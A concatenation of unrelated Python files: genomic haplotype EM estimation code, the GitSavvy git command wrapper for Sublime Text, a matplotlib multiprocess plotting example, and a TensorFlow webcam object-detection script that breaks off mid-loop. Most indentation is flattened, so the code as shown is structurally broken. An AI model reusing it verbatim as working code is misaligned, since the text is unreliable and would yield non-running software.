def bridge_windows(hap_window_dics, shiftsize=1, winsize=3, alleleset=('0','1'), deterministic=False):
"""combine haplotype windows, starting from the leftmost window, using the probabilities of the possible haplotypes within each window.
If deterministic haplotypes are required, report a phasing estimate for each haplotype block (window) obtained by calculating the expected dosages from the probabilities."""
Haplo_Blocks = [] # homologues and probs estimated for each haploblock
starts = [] #start SNP position for each haploblock
stops = [] #stop SNP position for each haploblock
current_found = False
_start_win_num = -1
while not current_found:
_start_win_num+=1
try:
if not any(math.isnan(_prob) for _prob in hap_window_dics[_start_win_num].values()):
current_window = hap_window_dics[_start_win_num]
current_found = True
except IndexError:
sys.stderr.write("ERROR: No haplotype windows with proper probabilites given to bridge!\n")
return Haplo_Blocks
next_window_number = _start_win_num
current_added = False # has the current window been added to the haplotype blocks?
len_hap = len(hap_window_dics.keys())
while next_window_number < (len_hap-1): # for test, just stack windows
next_window_number += 1
next_found = False
while (not next_found) and (next_window_number < len_hap):
if not (any(math.isnan(_prob) for _prob in hap_window_dics[next_window_number].values())):
#if (stops==[]) or (next_window_number*shiftsize > stops[-1]): # this results in non-overlapping windows
if 1:
next_found = True
current_window = hap_window_dics[next_window_number] # start a new block with the next window
starts.append(next_window_number*shiftsize) # start position of the new haplotype block stored
stops.append(next_window_number*shiftsize+min(len(next(iter(current_window))), winsize)-1) # stop position of the current haplotype block stored
Haplo_Blocks.append(current_window)
else:
next_window_number+=1
else:
next_window_number+=1
Haplo_Blocks_new = []
for _n, _block in enumerate(Haplo_Blocks):
Haplo_Blocks_new.append([])
for _H in _block.keys():
# print(starts[_n], stops[_n], _H)
Haplo_Blocks_new[-1].append(Haplotypes(starts[_n], stops[_n], _block[_H], 0, None, None, _H))
return Haplo_Blocks_new
def scan_region(bamfile, vcffile, windowsize = 3, shiftsize=1, outprefix = 'scan', eps=1e-06, eps_rel=1e-04, maxit=5000, use_relative=False, maxIS=500, mbq=10, mmq=9, qoffset=33, min_cov = 4, expression = True, verbose=False):
"""scan the SNPs given by vcffile, using a window of size winodwsize. The haplotypes (expression) dosages are estimated for the SNPs in each window from the bam file and
written to a dat files for that window. Windows will slide one or more nucleotides at each scanning step according to the shiftsize (l-windowsize+1 windows in total with
shiftsize = 1 and l//windowsize+1 windows with shiftsize = windowsize)."""
output = []
sema, lock , Parallel = GetSemaLock(True)
threads = []
if Parallel:
manager = mpthread.Manager()
Frag_lsts, Q_lsts, Samples = get_frags(bamfile, vcffile, maxIS, mbq, mmq, qoffset)
if not Samples:
raise InputError('No sample name included in the bam header!')
alleleSet = [str(_allele) for _allele in set(_x for _y in getAllelesPop(vcffile, Samples) for _x in _y[2].values())] # obtain the set of alleles observed at all variation sites
varpos = [] # obtain the variant positions from the vcf file
with open(vcffile, 'rU') as _vcfh:
for _line in _vcfh:
if '#'!=_line.strip()[0]:
varpos.append(_line.strip().split()[1])
l = len(varpos)
if Parallel:
garbage = [manager.list() for _start in range(0, l-windowsize+shiftsize, shiftsize)]
else:
garbage = [[] for _start in range(0, l-windowsize+shiftsize, shiftsize)]
_index = -1
_start = -1*shiftsize
while _start<(l-windowsize):
_index+=1
_start+=shiftsize
current_varpos = varpos[_start:_start+windowsize]
if Parallel:
t = mpthread.Process(target=thread_func, name = "Haplotype window {0:d}".format(_index+1),
args = (sema, lock, garbage[_index], make_data_for_window,
current_varpos,Frag_lsts, Q_lsts, Samples, vcffile, outprefix+'_window_'+str(_index+1)+'_from_position_'+str(current_varpos[0])+'_to_position_'+str(current_varpos[-1])+'.dat', eps, eps_rel, maxit, use_relative),
kwargs = {'maxIS':maxIS, 'mbq':mbq, 'mmq':mmq, 'qoffset':qoffset, 'alleles':alleleSet, 'min_cov':min_cov, 'expression':expression,
'varpos':varpos, 'verbose':verbose, 'Parallel':Parallel})
else:
t = threading.Thread(target=thread_func, name = "Haplotype window {0:d}".format(_index+1),
args = (sema, lock, garbage[_index], make_data_for_window,
current_varpos,Frag_lsts, Q_lsts, Samples, vcffile, outprefix+'_window_'+str(_index+1)+'_from_position_'+str(current_varpos[0])+'_to_position_'+str(current_varpos[-1])+'.dat', eps, eps_rel, maxit, use_relative),
kwargs = {'maxIS':maxIS, 'mbq':mbq, 'mmq':mmq, 'qoffset':qoffset, 'alleles':alleleSet, 'min_cov':min_cov, 'expression':expression,
'varpos':varpos, 'verbose':verbose, 'Parallel':Parallel})
sema.acquire()
threads.append(t)
t.start()
for _thread in threads:
_thread.join()
def make_data_for_window(window,Frag_lsts, Q_lsts, Samples, vcffile, outfile = None, eps = 1e-06, eps_rel = 1e-04, maxit=1000, use_relative= False, maxIS=500, mbq=10, mmq=9, qoffset=33, alleles = ('0','1'), min_cov = 4, expression = True, varpos = None, queue = False, verbose=False, Parallel=False):
"""Gets SNP-fragments and then generates a data frame: sample names are the rows and the dosages of
each windowed haplotype are stored in the columns. Window gives SNP positions to be included in the windowed haplotype
as a list. Assuming bi-allelic SNPs (0/1), 2**len(window) haplotypes will be possible, and the dosage of each is determined
from the SNP-fragments. The results will be written to the given outfile or to standard output."""
if not outfile:
outhandel = sys.stdout
else:
outhandel = open(outfile, 'w')
if not varpos:
varpos = []
with open(vcffile, 'rU') as _vcfh:
for _line in _vcfh:
if '#'!=_line.strip()[0]:
varpos.append(_line.strip().split()[1])
window = {varpos.index(str(_base)): _winpos for _winpos, _base in enumerate(window)}
all_haplos = [_winhaplo for _winhaplo in itertools.product(*[alleles for _winpos in range(0,len(window))])] # all of the haplotypes possible in the window
if not queue:
garbage = outhandel.write("Sample"+'\t'+'\t'.join('H_'+''.join(_haplo) for _haplo in all_haplos)+'\n') #write the header for the data frame file
l = len(window) # length of the haplotypes (just equal to the size of the SNP scanning window)
N = len(all_haplos) # number of the haplotypes
norm = 1.
if queue:
Outqueue = OrderedDict()
else:
Outqueue = None
for _sn, _sample in enumerate(Samples): # initialize the EM-algorithm and set once and for all the compatibility matrix
to_delete = [] # delete SNP-fragments that do not overlap with the current window
coverage = len(Frag_lsts[_sn]) # total number of reads for sample _sn
Matrix = [[0 for _j in range(0, N)] for _i in range(0,coverage)] # compatibility matrix for the reads (_i) vs haplotypes (_j) for sample _sn
sample_haplo_dict = OrderedDict({_h:1./N for _h in all_haplos}) # Ordered dictionary to store the dosages of the window haplotypes for each sample
for _i in range(0, len(Frag_lsts[_sn])):
_SNP_frag = Frag_lsts[_sn][_i].GetDict() # get the dictionary corresponding to the SNP-fragment (throwing '-' alleles away)
_overlap = set(window.keys()) & set(_SNP_frag.keys()) # set of SNP positions common between the SNP-fragment and the current window
if not _overlap: # if no overlap with the window
to_delete.append(_i)
else:
_j = -1
for _h in sample_haplo_dict.keys(): # for each read, detect window haplotypes compatible with that read
_j+=1
_read_belongs_2_hap = True
for _base in _overlap:
if _SNP_frag[_base]!=_h[window[_base]]:
_read_belongs_2_hap = False
break
if _read_belongs_2_hap:
Matrix[_i][_j] = 1
Frag_lsts[_sn] = np.delete(Frag_lsts[_sn], to_delete, axis= None).tolist()
Matrix = np.delete(Matrix, to_delete, axis=0)
sample_haplo_dict = EM(sample_haplo_dict, Matrix, l, eps, eps_rel, maxit, min_cov, use_relative=use_relative, verbose=verbose) #, 1e-12, use_relative = True)
if expression:
norm = 1.
else: # normalize the haplotype specific expression rates to obtain haplotype dosages if the data is genomic, i.e. NOT RNA-seq expression data
norm = sum(sample_haplo_dict[_haplo] for _haplo in all_haplos)
if queue:
output = OrderedDict()
for _haplo in all_haplos:
output[_haplo] = sample_haplo_dict[_haplo]/norm
Outqueue[_sample] = output
else:
garbage = outhandel.write(_sample+'\t'+'\t'.join("{0:.3f}".format(sample_haplo_dict[_haplo]/norm) for _haplo in all_haplos)+'\n')
if Parallel or outfile: # close stdout descriptor in case several processes are run or close the outfile handle in case output is given
try:
os.close(outhandel.fileno())
except:
pass
return Outqueue
def EM(haplo_dict, M, l, eps = 1e-06, eps_rel = 1e-04, itermax = 1000, min_cov = 4, use_relative=False, verbose = True):
""" EM algorithm to obtain haplotype frequencies, using the NGS reads that cover a region and the initial Poisson rates
for the hidden haplotypes (given in sample_haplo_dict). Absolute convergence test is used with eps value unless use_relative
is set True in which case relative (less strict with log kernel) convergence is tested with eps_rel.
Q(R|U) = E[log(poisson(k_1|lu_1)*poisson(k_2|lu_2)*...*poisson(k_N|lu_N))] =
E[log(exp(-l*u_1)*(l*u_1)**k_1/k_1! * exp(-l*u_2)*(l*u_2)**k_2/k_2! *...* exp(-l*u_N)*(l*u_N)**k_N/k_N!)] =
E[-l*u_1 + k_1*(log(l)+log(u_1)) - log(k_1!)+
-l*u_2 + k_2*(log(l)+log(u_2)) - log(k_2!)+
...
-l*u_N + k_N*(log(l)+log(u_N)) - log(k_N!)] =
-l*(u_1+u_2+...+u_N) + c*log(l) + sum(E[k_i|U]*log(u_i) for i in 1,2,...,N) - sum(log(E[k_i|U]!) for i in 1,2,...N)
=> Q(R|U) = -l*(u_1+u_2+...+u_N) + sum(E[k_i|U]*log(u_i) for i in 1,2,...,N) - sum(log(E[k_i|U]!) for i in 1,2,...N) => u_i = E[k_i|U]/l (Maximization)
E(k_i|U) obtained from the expectation step."""
process_name = mpthread.current_process().name
thread_name = threading.current_thread().name
converged = False # convergence not reached
iteration = 1 # current iteration
c = len(M) # total read count for the region
if c < min_cov:
sys.stderr.write('[{0:s}:{1:s}] ERROR: Coverage was too low to estimate haplotypes!\n'.format(process_name, thread_name))
for _key in haplo_dict.keys():
haplo_dict[_key] = float('NaN')
return haplo_dict
while (not converged and iteration<=itermax):
count_haplo_dict = get_expectation(haplo_dict, M) # Expectation (E) step
log_count = np.log([_u for _u in haplo_dict.values()])
valid_haps = [_n for _n in range(0, len(haplo_dict.values())) if not (math.isnan(log_count[_n]) or math.isinf(log_count[_n]))]
current_kernel = -l*sum(haplo_dict.values()[_n] for _n in valid_haps) + np.dot([count_haplo_dict.values()[_n] for _n in valid_haps], [log_count[_n] for _n in valid_haps]) - sum(logfact(count_haplo_dict.values()[_n]) for _n in valid_haps) #current kernel value
new_haplo_dict = OrderedDict()
for _h in haplo_dict.keys(): #maximization (M) step
new_haplo_dict[_h] = count_haplo_dict[_h]/float(l)
new_count_haplo_dict = get_expectation(new_haplo_dict, M)
new_log_count = np.log([_u for _u in new_haplo_dict.values()])
new_valid_haps = [_n for _n in range(0, len(new_haplo_dict.values())) if not (math.isnan(new_log_count[_n]) or math.isinf(new_log_count[_n]))]
new_kernel = -l*sum(new_haplo_dict.values()[_n] for _n in new_valid_haps) + np.dot([new_count_haplo_dict.values()[_n] for _n in new_valid_haps], [new_log_count[_n] for _n in new_valid_haps]) - sum(logfact(new_count_haplo_dict.values()[_n]) for _n in new_valid_haps) #update kernel value
diff = new_kernel - current_kernel
if diff<0 and verbose:
sys.stderr.write("[{1:s}:{2:s}] WARNING: likelihood decreased at EM iteration {0:d}!\n".format(iteration, process_name, thread_name))
if not use_relative:
converged = abs(diff) < eps
else:
converged = float(diff)/abs(max(new_kernel, current_kernel)) < eps_rel
haplo_dict = OrderedDict()
for _key in new_haplo_dict.keys():
haplo_dict[_key] = new_haplo_dict[_key]
iteration+=1
if verbose and not converged:
sys.stderr.write("[{1:s}:{2:s}] WARNING: convergence NOT acheived after {0:d} iterations!\n".format(itermax, process_name, thread_name))
elif verbose:
sys.stderr.write("[{1:s}:{2:s}] Convergence achieved at {0:d}'th iteration!\n".format(iteration-1, process_name, thread_name))
if verbose and not use_relative:
sys.stderr.write("[{1:s}:{2:s}] Absolute difference in log likelihood at termination: {0:5.4e}\n".format(diff, process_name, thread_name))
elif verbose:
sys.stderr.write("[{1:s}:{2:s}] Relative difference in log likelihood at termination: {0:5.4e}\n".format(float(diff)/abs(max(new_kernel, current_kernel)), process_name, thread_name))
return haplo_dict
def logfact(n):
"""calculate the log factorial function in a way to avoid overflow."""
global logfactorial_table
if n<1000.5:
return logfactorial_table[round(n)]
else:
return (n-1/2)*log(n)-n+(1/2)*log(2*math.pi)+1/(12*n) # approximate by Gamma function
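# A minimal usage sketch (hypothetical names: get_expectation, the read structure M and the
# Poisson rate l come from the surrounding pipeline, and logfactorial_table must be built
# before logfact is called):
#   initial = OrderedDict([('hap1', 1.0), ('hap2', 1.0)])
#   frequencies = EM(initial, M, l=30.0, verbose=False)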
|
git_command.py
|
"""
Define a base command class that:
1) provides a consistent interface with `git`,
2) implements common git operations in one place, and
3) tracks file- and repo-specific data that is necessary
   for Git operations.
"""
import os
import subprocess
import shutil
import re
import threading
import traceback
import sublime
from ..common import util
from .git_mixins.status import StatusMixin
from .git_mixins.active_branch import ActiveBranchMixin
from .git_mixins.branches import BranchesMixin
from .git_mixins.stash import StashMixin
from .git_mixins.stage_unstage import StageUnstageMixin
from .git_mixins.checkout_discard import CheckoutDiscardMixin
from .git_mixins.remotes import RemotesMixin
from .git_mixins.ignore import IgnoreMixin
from .git_mixins.tags import TagsMixin
from .git_mixins.history import HistoryMixin
from .git_mixins.rewrite import RewriteMixin
from .git_mixins.merge import MergeMixin
from .exceptions import GitSavvyError
from .settings import SettingsMixin
import time
git_path = None
error_message_displayed = False
UTF8_PARSE_ERROR_MSG = (
"GitSavvy was unable to parse Git output as UTF-8. Would "
"you like to use the fallback encoding specified in GitSavvy "
"settings? Text may not appear as expected."
)
FALLBACK_PARSE_ERROR_MSG = (
"The Git command returned data that unparsable. This may happen "
"if you have checked binary data into your repository. The current "
"operation has been aborted."
)
GIT_TOO_OLD_MSG = "Your Git version is too old. GitSavvy requires {:d}.{:d}.{:d} or above."
# git minimum requirement
GIT_REQUIRE_MAJOR = 1
GIT_REQUIRE_MINOR = 9
GIT_REQUIRE_PATCH = 0
class LoggingProcessWrapper(object):
"""
    Wraps a Popen object with support for logging stdout/stderr
"""
def __init__(self, process, timeout):
self.timeout = timeout
self.process = process
self.stdout = b''
self.stderr = b''
def read_stdout(self):
try:
for line in iter(self.process.stdout.readline, b""):
self.stdout = self.stdout + line
util.log.panel_append(line.decode())
except IOError as err:
util.log.panel_append(err)
def read_stderr(self):
try:
for line in iter(self.process.stderr.readline, b""):
self.stderr = self.stderr + line
util.log.panel_append(line.decode())
except IOError as err:
util.log.panel_append(err)
def communicate(self, stdin):
"""
Emulates Popen.communicate
Writes stdin (if provided)
Logs output from both stdout and stderr
Returns stdout, stderr
"""
if stdin is not None:
self.process.stdin.write(stdin)
self.process.stdin.flush()
self.process.stdin.close()
stdout_thread = threading.Thread(target=self.read_stdout)
stdout_thread.start()
stderr_thread = threading.Thread(target=self.read_stderr)
stderr_thread.start()
self.process.wait()
stdout_thread.join(self.timeout / 1000)
stderr_thread.join(self.timeout / 1000)
return self.stdout, self.stderr
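# A minimal usage sketch for LoggingProcessWrapper (illustrative only; the live panel
# logging assumes Sublime's util.log is available):
#   p = subprocess.Popen(["git", "fetch"], stdin=subprocess.PIPE,
#                        stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#   stdout, stderr = LoggingProcessWrapper(p, timeout=10000).communicate(None)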
class GitCommand(StatusMixin,
ActiveBranchMixin,
BranchesMixin,
StashMixin,
StageUnstageMixin,
CheckoutDiscardMixin,
RemotesMixin,
IgnoreMixin,
TagsMixin,
HistoryMixin,
RewriteMixin,
MergeMixin,
SettingsMixin
):
"""
Base class for all Sublime commands that interact with git.
"""
_last_remotes_used = {}
def git(self, *args,
stdin=None,
working_dir=None,
show_panel=False,
throw_on_stderr=True,
decode=True,
encode=True,
stdin_encoding="UTF-8",
custom_environ=None):
"""
Run the git command specified in `*args` and return the output
of the git command as a string.
If stdin is provided, it should be a string and will be piped to
the git process. If `working_dir` is provided, set this as the
current working directory for the git process; otherwise,
the `repo_path` value will be used.
"""
args = self._include_global_flags(args)
command = (self.git_binary_path, ) + tuple(arg for arg in args if arg)
command_str = " ".join(command)
show_panel_overrides = self.savvy_settings.get("show_panel_for")
show_panel = show_panel or args[0] in show_panel_overrides
close_panel_for = self.savvy_settings.get("close_panel_for") or []
if args[0] in close_panel_for:
sublime.active_window().run_command("hide_panel", {"cancel": True})
live_panel_output = self.savvy_settings.get("live_panel_output", False)
stdout, stderr = None, None
try:
if not working_dir:
working_dir = self.repo_path
except RuntimeError as e:
# do not show panel when the window does not exist
raise GitSavvyError(e, show_panel=False)
except Exception as e:
# offer initialization when "Not a git repository" is thrown from self.repo_path
if type(e) == ValueError and e.args and "Not a git repository" in e.args[0]:
sublime.set_timeout_async(
lambda: sublime.active_window().run_command("gs_offer_init"))
raise GitSavvyError(e)
try:
startupinfo = None
if os.name == "nt":
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
environ = os.environ.copy()
environ.update(custom_environ or {})
start = time.time()
p = subprocess.Popen(command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=working_dir,
env=environ,
startupinfo=startupinfo)
def initialize_panel():
# clear panel
util.log.panel("")
if self.savvy_settings.get("show_stdin_in_output") and stdin is not None:
util.log.panel_append("STDIN\n{}\n".format(stdin))
if self.savvy_settings.get("show_input_in_output"):
util.log.panel_append("> {}\n".format(command_str))
if show_panel and live_panel_output:
wrapper = LoggingProcessWrapper(p, self.savvy_settings.get("live_panel_output_timeout", 10000))
initialize_panel()
if stdin is not None and encode:
stdin = stdin.encode(encoding=stdin_encoding)
if show_panel and live_panel_output:
stdout, stderr = wrapper.communicate(stdin)
else:
stdout, stderr = p.communicate(stdin)
if decode:
stdout, stderr = self.decode_stdout(stdout), self.decode_stdout(stderr)
if show_panel and not live_panel_output:
initialize_panel()
if stdout:
util.log.panel_append(stdout)
if stderr:
if stdout:
util.log.panel_append("\n")
util.log.panel_append(stderr)
except Exception as e:
# this should never be reached
raise GitSavvyError("Please report this error to GitSavvy:\n\n{}\n\n{}".format(e, traceback.format_exc()))
finally:
end = time.time()
if decode:
util.debug.log_git(args, stdin, stdout, stderr, end - start)
else:
util.debug.log_git(
args,
stdin,
self.decode_stdout(stdout),
self.decode_stdout(stderr),
end - start
)
if show_panel and self.savvy_settings.get("show_time_elapsed_in_output", True):
util.log.panel_append("\n[Done in {:.2f}s]".format(end - start))
if throw_on_stderr and not p.returncode == 0:
sublime.active_window().status_message(
"Failed to run `git {}`. See log for details.".format(command[1])
)
if "*** Please tell me who you are." in stderr:
sublime.set_timeout_async(
lambda: sublime.active_window().run_command("gs_setup_user"))
if stdout or stderr:
raise GitSavvyError("`{}` failed with following output:\n{}\n{}".format(
command_str, stdout, stderr
))
else:
raise GitSavvyError("`{}` failed.".format(command_str))
return stdout
def decode_stdout(self, stdout):
fallback_encoding = self.savvy_settings.get("fallback_encoding")
silent_fallback = self.savvy_settings.get("silent_fallback")
try:
return stdout.decode()
except UnicodeDecodeError:
try:
return stdout.decode("latin-1")
except UnicodeDecodeError as unicode_err:
if silent_fallback or sublime.ok_cancel_dialog(UTF8_PARSE_ERROR_MSG, "Fallback?"):
try:
return stdout.decode(fallback_encoding)
except UnicodeDecodeError as fallback_err:
sublime.error_message(FALLBACK_PARSE_ERROR_MSG)
raise fallback_err
raise unicode_err
@property
def encoding(self):
return "UTF-8"
@property
def git_binary_path(self):
"""
Return the path to the available `git` binary.
"""
global git_path, error_message_displayed
if not git_path:
git_path_setting = self.savvy_settings.get("git_path")
if isinstance(git_path_setting, dict):
git_path = git_path_setting.get(sublime.platform())
if not git_path:
git_path = git_path_setting.get('default')
else:
git_path = git_path_setting
if not git_path:
git_path = shutil.which("git")
try:
startupinfo = None
if os.name == "nt":
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
stdout = subprocess.check_output(
[git_path, "--version"],
stderr=subprocess.PIPE,
startupinfo=startupinfo).decode("utf-8")
except Exception:
stdout = ""
git_path = None
match = re.match(r"git version ([0-9]+)\.([0-9]+)\.([0-9]+)", stdout)
if match:
major = int(match.group(1))
minor = int(match.group(2))
patch = int(match.group(3))
if major < GIT_REQUIRE_MAJOR \
or (major == GIT_REQUIRE_MAJOR and minor < GIT_REQUIRE_MINOR) \
or (major == GIT_REQUIRE_MAJOR and minor == GIT_REQUIRE_MINOR and patch < GIT_REQUIRE_PATCH):
msg = GIT_TOO_OLD_MSG.format(
GIT_REQUIRE_MAJOR,
GIT_REQUIRE_MINOR,
GIT_REQUIRE_PATCH)
git_path = None
if not error_message_displayed:
sublime.error_message(msg)
error_message_displayed = True
raise ValueError("Git binary too old.")
if not git_path:
msg = ("Your Git binary cannot be found. If it is installed, add it "
"to your PATH environment variable, or add a `git_path` setting "
"in the GitSavvy settings.")
if not error_message_displayed:
sublime.error_message(msg)
error_message_displayed = True
raise ValueError("Git binary not found.")
return git_path
def find_working_dir(self):
view = self.window.active_view() if hasattr(self, "window") else self.view
window = view.window() if view else None
if view and view.file_name():
file_dir = os.path.dirname(view.file_name())
if os.path.isdir(file_dir):
return file_dir
if window:
folders = window.folders()
if folders and os.path.isdir(folders[0]):
return folders[0]
return None
def find_repo_path(self):
"""
        Similar to find_working_dir, except that it does not stop at the first
        directory found, but at the first git repository found.
"""
view = self.window.active_view() if hasattr(self, "window") else self.view
window = view.window() if view else None
repo_path = None
# try the current file first
if view and view.file_name():
file_dir = os.path.dirname(view.file_name())
if os.path.isdir(file_dir):
repo_path = self.find_git_toplevel(file_dir, throw_on_stderr=False)
# fallback: use the first folder if the current file is not inside a git repo
if not repo_path:
if window:
folders = window.folders()
if folders and os.path.isdir(folders[0]):
repo_path = self.find_git_toplevel(
folders[0], throw_on_stderr=False)
return os.path.realpath(repo_path) if repo_path else None
def find_git_toplevel(self, folder, throw_on_stderr):
stdout = self.git(
"rev-parse",
"--show-toplevel",
working_dir=folder,
throw_on_stderr=throw_on_stderr
)
repo = stdout.strip()
return os.path.realpath(repo) if repo else None
@property
def repo_path(self):
"""
Return the absolute path to the git repo that contains the file that this
view interacts with. Like `file_path`, this can be overridden by setting
the view's `git_savvy.repo_path` setting.
"""
# The below condition will be true if run from a WindowCommand and false
# from a TextCommand.
view = self.window.active_view() if hasattr(self, "window") else self.view
repo_path = view.settings().get("git_savvy.repo_path") if view else None
if not repo_path or not os.path.exists(repo_path):
repo_path = self.find_repo_path()
if not repo_path:
window = view.window()
if window:
if window.folders():
raise ValueError("Not a git repository.")
else:
raise ValueError("Unable to determine Git repo path.")
else:
raise RuntimeError("Window does not exist.")
if view:
file_name = view.file_name()
# only set "git_savvy.repo_path" when the current file is in repo_path
if file_name and os.path.realpath(file_name).startswith(repo_path + os.path.sep):
view.settings().set("git_savvy.repo_path", repo_path)
return os.path.realpath(repo_path) if repo_path else repo_path
@property
def short_repo_path(self):
if "HOME" in os.environ:
return self.repo_path.replace(os.environ["HOME"], "~")
else:
return self.repo_path
@property
def file_path(self):
"""
Return the absolute path to the file this view interacts with. In most
cases, this will be the open file. However, for views with special
functionality, this default behavior can be overridden by setting the
view's `git_savvy.file_path` setting.
"""
# The below condition will be true if run from a WindowCommand and false
# from a TextCommand.
view = self.window.active_view() if hasattr(self, "window") else self.view
fpath = view.settings().get("git_savvy.file_path")
if not fpath:
fpath = view.file_name()
if fpath:
view.settings().set("git_savvy.file_path", os.path.realpath(fpath))
return os.path.realpath(fpath) if fpath else fpath
def get_rel_path(self, abs_path=None):
"""
Return the file path relative to the repo root.
"""
path = abs_path or self.file_path
return os.path.relpath(os.path.realpath(path), start=self.repo_path)
def _include_global_flags(self, args):
"""
Transforms the Git command arguments with flags indicated in the
global GitSavvy settings.
"""
git_cmd, *addl_args = args
global_flags = self.savvy_settings.get("global_flags")
if global_flags and git_cmd in global_flags:
args = [git_cmd] + global_flags[git_cmd] + addl_args
return args
@property
def last_remote_used(self):
"""
With this getter and setter, keep global track of last remote used
for each repo. Will return whatever was set last, or active remote
if never set. If there is no tracking remote, use "origin".
"""
remote = self._last_remotes_used.get(self.repo_path)
if not remote:
remote = self.get_upstream_for_active_branch().split("/")[0]
if not remote:
remote = "origin"
return remote
@last_remote_used.setter
def last_remote_used(self, value):
"""
Setter for above property. Saves per-repo information in
class attribute dict.
"""
self._last_remotes_used[self.repo_path] = value
|
plotter.py
|
import multiprocessing as mp
import time
import matplotlib.pyplot as plt
import numpy as np
# Sample code from:
# https://matplotlib.org/3.3.3/gallery/misc/multiprocess_sgskip.html#sphx-glr-gallery-misc-multiprocess-sgskip-py
class ProcessPlotter:
def __init__(self):
self.x = []
self.y = []
def terminate(self):
plt.close('all')
def call_back(self):
while self.pipe.poll():
command = self.pipe.recv()
if command is None:
self.terminate()
return False
else:
self.x.append(command[0])
self.y.append(command[1])
self.ax.plot(self.x, self.y, 'ro')
self.fig.canvas.draw()
return True
def __call__(self, pipe):
print('starting plotter...')
self.pipe = pipe
self.fig, self.ax = plt.subplots()
timer = self.fig.canvas.new_timer(interval=1000)
timer.add_callback(self.call_back)
timer.start()
print('...done')
plt.show()
class NBPlot:
def __init__(self):
self.plot_pipe, plotter_pipe = mp.Pipe()
self.plotter = ProcessPlotter()
self.plot_process = mp.Process(
target=self.plotter, args=(plotter_pipe,), daemon=True)
self.plot_process.start()
def plot(self, finished=False):
send = self.plot_pipe.send
if finished:
send(None)
else:
data = np.random.random(2)
send(data)
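# NBPlot owns the sending end of the pipe: plot() pushes an (x, y) pair (or None to stop),
# while ProcessPlotter.call_back polls the receiving end from a GUI timer inside the
# plotting process, so the main process never touches matplotlib directly.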
def main():
pl = NBPlot()
for ii in range(10):
pl.plot()
time.sleep(0.5)
pl.plot(finished=True)
if __name__ == '__main__':
if plt.get_backend() == "MacOSX":
mp.set_start_method("forkserver")
main()
|
run.py
|
import os # To perform OS-level operations.
import six
import cv2 # OpenCV for Computer Vision
import labelcolors # It has a dictionary that contains colors for each label
import argparse # To get arguments
import collections
import numpy as np
import pyttsx3 # To perform text to speech function
import threading # To perform multi-threading operations
import playsound # To play sounds
import tensorflow as tf # Main Library.
from object_detection.utils import label_map_util # To handle label map.
from object_detection.utils import config_util # To load model pipeline.
from object_detection.utils import visualization_utils as viz_utils # To draw rectangles.
from object_detection.builders import model_builder # To load & Build models.
ap = argparse.ArgumentParser() # Create argparse object
ap.add_argument("-m", "--model_name", required=True, help="Name of the model") # Create model_name argument
ap.add_argument("-l", "--labels", required=True, help="Labels that are needed to be detected") # Create labels argument
ap.add_argument("-a", "--alarm", required=True, help="Alram status") # Alarm required or not argument
ap.add_argument("-t", "--minimum_threshold", required=True, help="Minimum threshold of detection rate") # minimum_threshol
ap.add_argument("-s", "--source", required=True, help="Source of processing") # video / webcam
args = vars(ap.parse_args()) # Parse the arguments into a dict
#Text to speech setup.
engine = pyttsx3.init()
en_voice_id = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Speech\Voices\Tokens\TTS_MS_EN-US_ZIRA_11.0" # female
ru_voice_id = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Speech\Voices\Tokens\TTS_MS_RU-RU_IRINA_11.0" # male
engine.setProperty('voice', en_voice_id)
rate = engine.getProperty('rate')
engine.setProperty('rate', rate - 25)
alarm_text_to_speech_notes = ""
def load_alarm_text_to_speech_notes():
    global alarm_text_to_speech_notes
    if args["alarm"] == "[TRUE]":
        with open('system-files//alarm-text-to-speech-notes.txt') as file:
            alarm_text_to_speech_notes = file.readline().strip()
load_alarm_text_to_speech_notes()
def talk_function(text): # Text-to-speech conversion
print("Computer: {}".format(text))
engine.say(text)
engine.runAndWait()
number_of_time_detected = 0
def play_alarm(): # Play the alarm sound and speak the alert text
    global number_of_time_detected
    playsound.playsound("system-files//alarm.mp3")
    talk_function(alarm_text_to_speech_notes)
    number_of_time_detected = 0
# Enable GPU dynamic memory allocation
gpus = tf.config.experimental.list_physical_devices('GPU')
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
processing_type = "" # Store processing type.
labels = [] # Store Labels in a list.
model_config_path = f'data/models/{args["model_name"]}/pipeline.config' # Store the path of config file
checkpoint_model_path = f'data/models/{args["model_name"]}/checkpoint/ckpt-0' # Store the path of model
label_map_path = f'data/mscoco_label_map.pbtxt' # Store the path of label_map
if args['labels'] == "all_labels":
processing_type = "all_labels" # Change processing_type as all_labels
else:
processing_type = "labels" # Change as labels to perform
if processing_type == "labels":
labels = args['labels'].split(",") # Store given labels to the labels list.
# Load pipeline config and build a detection model
configs = config_util.get_configs_from_pipeline_file(model_config_path)
model_config = configs['model']
detection_model = model_builder.build(model_config=model_config, is_training=False)
# Restore checkpoint
ckpt = tf.compat.v2.train.Checkpoint(model=detection_model)
ckpt.restore(checkpoint_model_path).expect_partial()
@tf.function
def detect_fn(image):
"""Detect objects in image."""
image, shapes = detection_model.preprocess(image)
prediction_dict = detection_model.predict(image, shapes)
detections = detection_model.postprocess(prediction_dict, shapes)
return detections, prediction_dict, tf.reshape(shapes, [-1])
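# detect_fn returns the post-processed detections dict (detection_boxes, detection_scores
# and detection_classes, each batched along axis 0), the raw prediction dict, and the
# reshaped image-shape tensor; the loop below only consumes the detections dict.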
category_index = label_map_util.create_category_index_from_labelmap(label_map_path,
use_display_name=True)
video_source = "";
if str(args["source"]).split("|")[0] == "[WEBCAM]":
video_source = int(args["source"].split("|")[1])
elif str(args["source"]).split("|")[0] == "[VIDEO]":
video_source = str(args["source"].split("|")[1])
cap = cv2.VideoCapture(video_source)
while True:
# Read frame from camera
ret, image_np = cap.read()
# Expand dimensions since the model expects images to have shape: [1, None, None, 3]
image_np_expanded = np.expand_dims(image_np, axis=0)
# Things to try:
# Flip horizontally
# image_np = np.fliplr(image_np).copy()
# Convert image to grayscale
# image_np = np.tile(
# np.mean(image_np, 2, keepdims=True), (1, 1, 3)).astype(np.uint8)
input_tensor = tf.convert_to_tensor(np.expand_dims(image_np, 0), dtype=tf.float32)
detections, predictions_dict, shapes = detect_fn(input_tensor)
label_id_offset = 1
image_np_with_detections = image_np.copy()
